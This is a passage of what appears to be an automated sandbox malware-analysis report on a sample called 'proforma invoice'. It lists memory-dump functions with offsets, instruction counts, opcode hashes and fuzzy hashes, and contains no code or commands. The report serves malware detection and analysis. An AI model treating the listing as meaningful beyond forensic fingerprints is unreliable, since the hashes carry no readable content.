Opcode ID: d421a7ade2739e8e6aa5d409a970f494a5026796966acd4fd84601b8752d4e44
Instruction ID: a1dfe8ad0b6633c228ac9399ea4b94e683d5e31c60498b9bc331774cb716ce17
Opcode Fuzzy Hash: d421a7ade2739e8e6aa5d409a970f494a5026796966acd4fd84601b8752d4e44
Instruction Fuzzy Hash: DC2180743102068FEB22EB2CF88C7AD3772FB85205F104965E415CF2A2EA79DD45CB92

Function 05E3CFA0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0737b9f309043eed15e01e06c072d1a5d0f8b643b866cf1d787bd5cbf63bf04
Instruction ID: f3b52072cf82de3f1a8c2e397b4b5c5a61ea95a0bae54074a1c86da05d47fa28
Opcode Fuzzy Hash: e0737b9f309043eed15e01e06c072d1a5d0f8b643b866cf1d787bd5cbf63bf04
Instruction Fuzzy Hash: D2219030E0020ADBDF14CFA4D9959AEB7B3BF89710F50855AE855EB350EB71A946CB40

Function 015BC6A8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27eea0b74248d97c6e21beb95d7a1e56a598e374c29319dc6b8953703dac8c67
Instruction ID: 13606ed00906e986fca3009e49a5feadee9e9712b50128bfba1687001094a743
Opcode Fuzzy Hash: 27eea0b74248d97c6e21beb95d7a1e56a598e374c29319dc6b8953703dac8c67
Instruction Fuzzy Hash: 443102B1C00249DFDB20CFAAD880BDEBFF8BF48310F24802AE519AB250D7746845CB90

Function 0156D006 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2578852617.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_156d000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8e7b36bea1a0f79096e3c272fac28aa2269e6f7dcee1052d06bbdaf290f4ca
Instruction ID: 537d918d5f8efe2fedfb69beb393a1f0f0272bae9c7e87eab16e5560af013bda
Opcode Fuzzy Hash: aa8e7b36bea1a0f79096e3c272fac28aa2269e6f7dcee1052d06bbdaf290f4ca
Instruction Fuzzy Hash: E7214B755093C09FCB03CB64D990715BF75AB46224F29C5DBD8888F2A7D23A984ACB62

Function 0156D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2578852617.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_156d000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952e5720d66675fd9ca0e765394722be6c254aae4d8e7460d87413b7451037aa
Instruction ID: 602e3b3c2ec2b6f5d17455b8b684a166dd4c258f23af816103e2df0e0fb2e2aa
Opcode Fuzzy Hash: 952e5720d66675fd9ca0e765394722be6c254aae4d8e7460d87413b7451037aa
Instruction Fuzzy Hash: 77212575604244DFDB11DF54D9C0B2ABBB9FB84324F20C969D8894F282D336D847CBA2

Function 015BA9F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516f9a16186e54eeb35e426122485c0752f14d7b8e0d80594002ec960cb15e42
Instruction ID: 96b7602216fed84108d6b92ee6fa1cf82db3ea68db7c2812352f9fd656a7ae60
Opcode Fuzzy Hash: 516f9a16186e54eeb35e426122485c0752f14d7b8e0d80594002ec960cb15e42
Instruction Fuzzy Hash: 342184306002055BEB32666CE6893AD3BA1F746315F544429F806CF352DEB8D8C4DBA6

Function 05E3CFB0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6688430b94d6e3e8945ffdb99a4bce45421527c9bc934239e74a4d3ecd0c7b9f
Instruction ID: 927c58f1888d0a1bd80e424f674c760183634175d04ba6face346fd13794df20
Opcode Fuzzy Hash: 6688430b94d6e3e8945ffdb99a4bce45421527c9bc934239e74a4d3ecd0c7b9f
Instruction Fuzzy Hash: 2F218030E0020A9BDB14CFA4D9559EEF7B3BF89710F50855AE851FB350EB71A946CB50

Function 015BA394 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 062547d152bf2c4aeb62c8094bf826d781b179e96c40e2d0988be269ab4baa32
Instruction ID: 4c4bf96218de7cb604884701ab9d37681fff3f4c16c5f70d899084ec00ad248a
Opcode Fuzzy Hash: 062547d152bf2c4aeb62c8094bf826d781b179e96c40e2d0988be269ab4baa32
Instruction Fuzzy Hash: 8611E27150E3955FE7139738D8E49F97FA4AF9612474944C7D080CF263D6206C0AC7B6

Function 015BB580 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55659d91c0cff4d6c472b8ec059d295d2c8572aeeef96d852ad613389729baf
Instruction ID: b01290cce9d72b04fbb8b925549c70bce0f6cc4d299507f445d8333b20b4abeb
Opcode Fuzzy Hash: c55659d91c0cff4d6c472b8ec059d295d2c8572aeeef96d852ad613389729baf
Instruction Fuzzy Hash: 2A212830700215CFDB25EF69D5997EE77F2BB88201F504869E006EB3A0EBB99D01CB61

Function 015BCE32 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5e7dbc29c5f1e320b68f800ca1b232094fb4ae703b36bfb783afe98a83765a
Instruction ID: f71b2df635a8c4aa201db548fd6a4076e7cd84e297297373d90b4ffe06cd0dc0
Opcode Fuzzy Hash: 3a5e7dbc29c5f1e320b68f800ca1b232094fb4ae703b36bfb783afe98a83765a
Instruction Fuzzy Hash: 7811E131F00516DFCB42CA68D8953DEB7B6FB84250F18C428E804DB344DB35CA018788

Function 015BB570 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c8994da1e0e0d6e7222a935536620c7d9392bfc7336941daf53971b2f1249d
Instruction ID: 41f4806a765ab44ce74798e9162b6f17c7139dc758439a2ac17de46301042145
Opcode Fuzzy Hash: e8c8994da1e0e0d6e7222a935536620c7d9392bfc7336941daf53971b2f1249d
Instruction Fuzzy Hash: CF212A71B00205CFDB25DF68D5997ED77F2BB48201F5048A9E106EB3A0EB798D01CB61

Function 015BAFA8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eaa3be8c7a91f23021c19e9c3ba9f1bdee3d6642c0421f5c6d3cacdc9df2895
Instruction ID: 2145c09eaedac9d64add97468f1a6672255a4a2ebdb6d9e4019c35df84959d54
Opcode Fuzzy Hash: 0eaa3be8c7a91f23021c19e9c3ba9f1bdee3d6642c0421f5c6d3cacdc9df2895
Instruction Fuzzy Hash: 72218E743102068FEB22DB2CF88C7AD3776FB85205F104924E40ACF261EA79DD858F91

Function 05E360D8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f118c7e7610e9f184de52e0ebfb256845d002448015f01150f61d5cd9ec78a
Instruction ID: 0b6aa870412bdd66bc031b96d8010fd718a6252882bd13cefd66994af1f3ec28
Opcode Fuzzy Hash: e7f118c7e7610e9f184de52e0ebfb256845d002448015f01150f61d5cd9ec78a
Instruction Fuzzy Hash: E2213C31A00206DFCB15DFA9C8809AEBBF2FF89315B10846DD519AB321DB36E851CF50

Function 05E382D8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8668eb05d007d8c6c73b7ff5f201276f1d93983aeb2b1d709603e97c83caeb7
Instruction ID: 4341f3ef56fda67f0812e8511c117b5378a0e3cfabc0f6fa33961ea1a091a0d3
Opcode Fuzzy Hash: e8668eb05d007d8c6c73b7ff5f201276f1d93983aeb2b1d709603e97c83caeb7
Instruction Fuzzy Hash: D1215734705205CFDB54EB78E55EAAD77F2FF89214B200068E406EB3A4DB359D04CB90

Function 0723A368 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f39f1b1ca2048a18337ea79830a56560b4588dfbe69baa05974d93e91903d50c
Instruction ID: 8429fae1109c13cfe894d19527d3d3d56ad93b80f530745108542167097ca8b0
Opcode Fuzzy Hash: f39f1b1ca2048a18337ea79830a56560b4588dfbe69baa05974d93e91903d50c
Instruction Fuzzy Hash: 1C21B1B0B2010A9BDF54DA69E55469DB7B6EBC5314F148439E409EB380DB75EC418B84

Function 07238658 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f617cfa29efd94698057375094b65148f3e256b5e329c45cf62f5af876706d4b
Instruction ID: 197196d715b18b061d6f25daec86956ec2b65b11ee3a571c6c99f650dd5fc2df
Opcode Fuzzy Hash: f617cfa29efd94698057375094b65148f3e256b5e329c45cf62f5af876706d4b
Instruction Fuzzy Hash: A12181B5A10706DFDB24CFA5CDC0AAFFBF6FB88200F108929E25597550D770A8458B91

Function 05E39BF0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d479468e89ae838156625dcffae5bd24e84a8c7e6e1e2fb8f28a67d4ab757f3
Instruction ID: 2061e3000cd28255464abe90a837704659f67c6b948747189f4d5afa1dfef798
Opcode Fuzzy Hash: 8d479468e89ae838156625dcffae5bd24e84a8c7e6e1e2fb8f28a67d4ab757f3
Instruction Fuzzy Hash: D011AF3170421A9FD765AF78E46869E77EAFBC5380F11847AD009CB391DA7A9C01CBD1

Function 015BBA50 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67016bcb2b29be96dda2ac3c466c9760e7a1c5815ce4c288baad170798055023
Instruction ID: 6b052e33302927a419d2d840f20fabe195e29ba8f7c8c4c7524e82d80a663dd1
Opcode Fuzzy Hash: 67016bcb2b29be96dda2ac3c466c9760e7a1c5815ce4c288baad170798055023
Instruction Fuzzy Hash: D211EB719097811FD3269B3DD8B129BBFF5AFC2110B0884ABC085CE263D964C809C7A6

Function 015BC488 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de75e85ed903ebfab30644f624844a05c9b78947797d96f84280f643c4a01e4f
Instruction ID: a3d8aacc665e2d564bd962c7b0e39fceadfa7e1a91fd5e07eedf8506baf582e6
Opcode Fuzzy Hash: de75e85ed903ebfab30644f624844a05c9b78947797d96f84280f643c4a01e4f
Instruction Fuzzy Hash: B3213AB0A0021A8FEB04CF69D988AAEBBF1FF89311F558069D505EB7A1DB749D00CB54

Function 015BC478 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02737255260ec065555bac0625cb88323f861959d7b37d372f06aeab7a6ed3b9
Instruction ID: fc962846a4fca6588d48e0fa1502fbb2ceac2abe5a57281481bef3b815680fd6
Opcode Fuzzy Hash: 02737255260ec065555bac0625cb88323f861959d7b37d372f06aeab7a6ed3b9
Instruction Fuzzy Hash: 28216DB1A006158FEB04CF69D998AADBBF1FF89211F458068D505EB7A1CB74ED01DB50

Function 015B0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac8d8c0abfb10fdeaa49f2de17fe718f063f592af94094ae2b54d556f0ca6d3
Instruction ID: 626776baf7ee29396603c7d2e12ef2f63cb90feffc77460eec7fd320b92c645f
Opcode Fuzzy Hash: 0ac8d8c0abfb10fdeaa49f2de17fe718f063f592af94094ae2b54d556f0ca6d3
Instruction Fuzzy Hash: 38114F30B006098BEF66AA6DD5947AF73B5FB45214F208879F406CF292DA35CE858BC1

Function 015BC5FA Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839eccfcbcb669e3fe19f099f2195cee0d1c0719a1e25964bcf61bda62682799
Instruction ID: c6569b0dea984e640c6c44f60bb25305b952672bbfc0514dc042b631e03988a1
Opcode Fuzzy Hash: 839eccfcbcb669e3fe19f099f2195cee0d1c0719a1e25964bcf61bda62682799
Instruction Fuzzy Hash: 1E01F532B0062247C716492CBCA4B6F6796FBC9A25B18813AED05DF385CE65EC0246C8

Function 015B0840 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486280fad6c58e13ccde5d70a0efebfeaaef8819f338d1204746763cfd3e57ca
Instruction ID: 27541bde0d59919fffff8a0ab0d35833676a9256485ac1f8eaccc10ce3844aa9
Opcode Fuzzy Hash: 486280fad6c58e13ccde5d70a0efebfeaaef8819f338d1204746763cfd3e57ca
Instruction Fuzzy Hash: 05115A30B002099BEF669A6CD5943BF72B5FB45214F204829F406CF282DA35CE858BC2

Function 015BAAF8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d340681175d4379356e20985d589c80529a96eaa345a350b89a704629d0f152f
Instruction ID: b9c17a2577937c8ebfa050a700e954f404b90d584e41ebe1019e99fad8af540f
Opcode Fuzzy Hash: d340681175d4379356e20985d589c80529a96eaa345a350b89a704629d0f152f
Instruction Fuzzy Hash: 0411A1B1E002168BCB11EFBC85D51EDBBF6FB99250B14087AC815EF301FA35C9428B95

Function 015BEF18 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c3edf7ff1a1d0bc4d26cbda61407caccc9ea675c91c89282a6cd068129e374
Instruction ID: 93f1548e54ff9c05755fcda0b39cfd63fa365a959db910f92793b53d3119c4db
Opcode Fuzzy Hash: f0c3edf7ff1a1d0bc4d26cbda61407caccc9ea675c91c89282a6cd068129e374
Instruction Fuzzy Hash: 3111A0313007069BD7159B29D5D69AEB7A6FBC4211748CA3AD51E8F710DF30EC059B81

Function 07237208 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace377082df1857d3c8fd3d040a62745986f9476d98b2f8be8d828a1d19e7ea0
Instruction ID: b62cf640e64018e252a1221da9156162f6ee9dc0cd1e12da3fa344cd604c1c9a
Opcode Fuzzy Hash: ace377082df1857d3c8fd3d040a62745986f9476d98b2f8be8d828a1d19e7ea0
Instruction Fuzzy Hash: 7D11C4B1B201268BCF58DAB8DC54AAE77EAEBC8310F108539E906E7354DE75CC0287D0

Function 015BB0B8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0177d8f89b8f552f41485966cdf80ce1faea65214f4f353da99bb1e38bf2706
Instruction ID: 0de1163d3d7ece0f633d9095577576a5d1365bd6fdb98d0e356e8e2641874f58
Opcode Fuzzy Hash: c0177d8f89b8f552f41485966cdf80ce1faea65214f4f353da99bb1e38bf2706
Instruction Fuzzy Hash: B011C275B00215DBCB10AF79A8896AE7BF5FF88251B108465EA0AD7301EF35C942D791

Function 015BC095 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c9dc683f2d61e2f7e90c9aff204afcc34574c94925426b437da2af1e6abd12
Instruction ID: e8421ef4b830754e685b351750426f5219187c3ac045ea648d5eca6dff60fde4
Opcode Fuzzy Hash: b8c9dc683f2d61e2f7e90c9aff204afcc34574c94925426b437da2af1e6abd12
Instruction Fuzzy Hash: 9E11A136A541098FDF14CBA8D489ADDBBF1FB89234F1948E1D608AB312C731E996CB51

Function 0155D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2578759809.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_155d000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction ID: 966c91c24330a9fc10c0da8fca0d1b528218b3fca4955b98ba42561d0e9bdc15
Opcode Fuzzy Hash: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction Fuzzy Hash: CB11B176504240CFDB16CF54D5C4B5ABF71FB88318F2486AADD090F656C33AD45ACBA1

Function 015BFCE1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387a67ff925c0140a43dff29a5801ac3606e4a4015aacf34eae66ffec775192d
Instruction ID: c5788fae7048b291a193fc9aeb8c0c0178db9ee287aedde1dc407a1b35609c44
Opcode Fuzzy Hash: 387a67ff925c0140a43dff29a5801ac3606e4a4015aacf34eae66ffec775192d
Instruction Fuzzy Hash: 6211E136B00264AFCB169F78ECD06D977B1FB8A314F21446BD940DF292DB769801CB80

Function 015BFF1A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668003812c1640d319d3e3818e123425add236d054f8fbe9d3406dada9b04189
Instruction ID: 6da4333448c36b133742ba8e859af007b41a97e3763cec45b375fac2cbef652a
Opcode Fuzzy Hash: 668003812c1640d319d3e3818e123425add236d054f8fbe9d3406dada9b04189
Instruction Fuzzy Hash: AB11F6B68002499FDB10CF9AD884BDEFFF4AB49310F10842ED529A7640C375A545CFA5

Function 07237440 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ec516a1d3131690341822e01743301c6c42fb5f2689373f265ead48dc015e
Instruction ID: 157603a664d2c7e8b686df7da55e2c05fb768bd905abc65020ff15d7513aac31
Opcode Fuzzy Hash: 985ec516a1d3131690341822e01743301c6c42fb5f2689373f265ead48dc015e
Instruction Fuzzy Hash: 2E01D4F17141134FEF249A6C998472BBBFADBC5614F14843AE20ECB365DD65DC028385

Function 07236EC0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a47b97be0a0db13e370e414887318df44e0c89d9c327b4aa440f6d41014838
Instruction ID: 1e725d0217827e2113abfdaadee71531988e2e7609bffcda54a036314661ac58
Opcode Fuzzy Hash: b7a47b97be0a0db13e370e414887318df44e0c89d9c327b4aa440f6d41014838
Instruction Fuzzy Hash: 7A21CCB5D11619AFDB00CF9AD984ADEFBF4FB48314F10812AE918A7640C378A944CFA5

Function 015BAB08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53764c1ce499a1ed79466f387cc1fd6c39bd21e1623cc50b40559625d4c819b
Instruction ID: d333670021257a05d17c6e41a3e4594ca33505ea25837dd909871814a1185d14
Opcode Fuzzy Hash: f53764c1ce499a1ed79466f387cc1fd6c39bd21e1623cc50b40559625d4c819b
Instruction Fuzzy Hash: 140140B1E002169FCB21EFBC84941EDBBF6FB99250B14087AD815EF241F635C9418B95

Function 05E361B0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984a819ea39fc041f606a046772e5b1dd71b554b9dac7e6658eaacb011f86f30
Instruction ID: 17e769636ba99db9aac8bf5b1029efd472a4602e303eefba0857317007b30bc0
Opcode Fuzzy Hash: 984a819ea39fc041f606a046772e5b1dd71b554b9dac7e6658eaacb011f86f30
Instruction Fuzzy Hash: 7C0180313043059FEB14DB75D889A6A77A6BFC4215700E92DA49A8F225EF70EC05C751

Function 0723D958 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5d2b5f4bd374b8c2a4880fd0406ca9e07f2ed3f43f24c26b24a4b44de363f8
Instruction ID: 72b2b5e4aa7a5a9d77e313674e6061cf91f489b7514dd736610df3709fbf4253
Opcode Fuzzy Hash: ef5d2b5f4bd374b8c2a4880fd0406ca9e07f2ed3f43f24c26b24a4b44de363f8
Instruction Fuzzy Hash: 9A0126B07140124FDB609A7CE85476A7BF2EBCA304F10846BF44ECB3A0DA75ED028380

Function 07236EC8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2353e3bf7404b83872d518575a7c30cc11c14700eaa73f38fb242be52c3c6cef
Instruction ID: 1dd164f3312a0a8e77462cd64cebf26e66f4471e3827cccee4383542ee07f56b
Opcode Fuzzy Hash: 2353e3bf7404b83872d518575a7c30cc11c14700eaa73f38fb242be52c3c6cef
Instruction Fuzzy Hash: C411DDB5D11619AFDB00CF9AD884ACEFBF8FB48314F10812AE918A7240C374A944CFA5

Function 015BFF20 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd678ae8595757b1ae7d2473230da1a113e44529237ecc1fbbac7ccd9c3f1077
Instruction ID: 45b4d1427518bef7a271d29c8fe644edd9c8a938036664f783aa4ecab4f1ab1e
Opcode Fuzzy Hash: bd678ae8595757b1ae7d2473230da1a113e44529237ecc1fbbac7ccd9c3f1077
Instruction Fuzzy Hash: 1811F3B68002099FDB10CF9AD884BDEFBF4AB49310F10842ED529A7640C375A545CFA5

Function 07237450 Relevance: .1, Instructions: 51COMMON

Download Yara Rule
